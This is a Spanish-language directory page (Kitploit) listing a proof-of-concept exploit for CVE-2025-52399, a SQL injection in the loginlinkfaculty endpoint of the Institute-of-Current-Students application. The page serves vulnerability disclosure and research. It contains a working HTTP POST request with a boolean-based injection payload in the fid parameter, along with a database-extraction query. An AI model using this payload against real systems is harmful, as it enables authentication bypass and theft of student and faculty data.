Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students — Exploit de prueba de concepto para CVE-2025-52399, que demuestra inyección SQL en el endpoint loginlinkfaculty de Institute-of-Current-Students, permitiendo omisión de autenticación y extracción de datos. | Kitploit
Herramientas/GitHubGitHub/userr404/cve-2025-52399-sqli-institute-of-current-students
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubuserr404/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

Exploit de prueba de concepto para CVE-2025-52399, que demuestra inyección SQL en el endpoint loginlinkfaculty de Institute-of-Current-Students, permitiendo omisión de autenticación y extracción de datos.

Ver Repositorio
151hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-52399 - Inyección SQL en Institute of Current Students

Resumen

El punto final loginlinkfaculty en la aplicación Institute-of-Current-Students es vulnerable a Inyección SQL a través del parámetro POST fid. El parámetro no se sanitiza correctamente antes de ser utilizado en una consulta SQL, lo que permite a atacantes remotos ejecutar comandos SQL arbitrarios.

  • Tipo de Vulnerabilidad: Inyección SQL
  • Componente Afectado: /loginlinkfaculty (POST)
  • Parámetro Afectado: fid
  • Autenticación: No requerida
  • Impacto: Omisión de autenticación, extracción de datos
  • Probado en: Localhost
  • Base de datos: icsnew
  • Versión: 1.0

PoC

Solicitud HTTP

root@kitploit:~
POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example

Resultado del Payload

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → VERDADERO ❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSO

Extracción de Base de Datos

SELECT database(); -- devuelve 'icsnew'

Referencias

  • CVE-2025-52399 (MITRE)
  • Aplicación Vulnerable
  • OWASP Inyección SQL

Descubridor

Isroil Mustafoqulov

Descargar herramienta